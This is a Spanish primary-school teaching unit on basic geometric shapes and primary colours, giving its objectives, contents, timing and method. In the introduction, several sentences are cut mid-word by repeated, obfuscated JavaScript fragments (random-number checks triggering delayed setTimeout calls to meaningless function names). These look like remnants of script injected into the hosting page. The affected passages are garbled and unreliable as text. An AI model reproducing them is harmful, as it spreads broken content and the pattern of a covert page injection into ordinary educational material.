VAMOS A PINTAR Y DAR FORMAS

Autora: Cristina Gimón Murciano

          El artículo que se presenta es una Unidad Didáctica del área de matemáticas, en la que se trabajan las Figuras Geométricas Planas: el círculo, el cuadrado y el triángulo. El nivel al que va dirigido es el primer ciclo de primaria.

 

INTRODUCCIÓN Y JUSTIFICACIÓN

          Las figuras geométricas es uno de los temas importantes que se ha llevado a cabo en Educación Infantil y se debe seguir trabajandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando en Educación Primaria, ya que es algo que está muy unido a la vida cotidiana y al desarrollo social del niño. Es decir, el entorno en el que el niño se va a desenvolver está lleno de todos los signos, colores, figuras…, que irán formandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando parte de su aprendizaje.


           Con esta unidad el niño irá afianzandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando una serie de conocimientos, conceptos, aptitudes y hábitos que le irán introduciendo en el mundo y en el entorno en el que más tarde tendrá que desenvolverse.


          Uno de los principales objetivos es que el niño refuerce  el pensamiento lógico-matemático, el conocimiento de las figuras geométricas básicas y los colores primarios, siempre recordandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando y globalizandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando con los conocimientos anteriores que tengan adquiridos; es decir, que como ya sabemos que la educación infantil es, o al menos debiera ser, globalizada, nos propondremos tocar otros objetivos anteriormente dados a la vez que van adquiriendo los nuevos, para que así surja un proceso de enseñanza-aprendizaje verdaderamente significativo, y el niño sepa enlazar correctamente unos conocimientos con otros. Que no supongan para él cosas aisladas.


           Esta Unidad Didáctica va dirigida al 1º Ciclo de Educación Primaria, comprendiendo las edades de 6-7 años.

TEMPORALIZACIÓN 

          El tiempo estimado para la realización de esta U.D. es de una semana de duración, siendo esta la primera semana del año académico, es decir, justamente al comienzo del curso (por lo que también introduciremos en ella muchos contenidos del año anterior).


          De estos cinco días que trabajaremos la unidad, en dos de ellos, a mitad de la clase, iremos al aula de informática para trabajar los contenidos dados con el ordenador de manera interactiva.


           Esta U.D. quedará abierta a la modificación, según el desarrollo de las clases, por lo que podría ser que en lugar de cinco días sean más.


 

 OBJETIVOS 

³    Colocarse dentro y fuera de un espacio y moverse por él.

³    Situar un objeto dentro o fuera de una frontera o dibujar algo en el interior o exterior de la misma.

³    Aprenda a utilizar los conceptos  “dentro-fuera”  y  “delante-detrás”.

³    Reconocer y trazar las tres figuras geométricas básicas: cuadrado, círculo y triángulo.

³    Separar una forma geométrica determinada de un montón de ellas.

³    Reconocer los colores primarios (rojo, amarillo y azul).

³    Clasificar los bloques lógicos de acuerdo con su forma, color, tamaño…

³    Seguir una serie sencilla de bloques lógicos.

³    Desarrollar las capacidades de observación, relacionar, representar, reconocer, discriminar, ordenar…

 ³    Introducir al niño en el desarrollo del pensamiento lógico-matemático.

³    Ampliar el vocabulario básico y específico-matemático.

CONTENIDOS 

Procedimentales


³    Comparación de distintos objetos en función de sus cualidades.

³    Verbalización del criterio de pertenencia o no pertenencia a una colección.

³    Identificación del atributo que define una colección.

³    Representación de la colección ya formada.

³    Ordenación de objetos atendiendo al grado de posesión de una determinada cualidad.

³    Identificación de relaciones de similitud cuantitativa y de diferenciación cuantitativa y de diferenciación cuantitativa en colecciones.

³    Aplicación de las nociones de direccionalidad que nacen del propio cuerpo: hacia delante – hacia atrás.

³    Reconocimiento de figuras planas: cuadrado, círculo, rectángulo, triángulo.

Conceptuales 


³    Simulación de los objetos en el espacio en relación con el mismo cuerpo, de uno mismo con los objetos, de un objeto con otro.


³    Aproximación a la línea recta y a la línea curva.

METODOLOGÍA 

¿Cómo enseñaremos?                                                                                                       

            Utilizaremos una metodología abierta, flexible y activa, donde dejaremos que el niño sea el protagonista y el profesor solo intervendrá de guía (corrigiendo los posibles errores que puedan tener los niños), para que así ellos adquieran por sí solos el aprendizaje.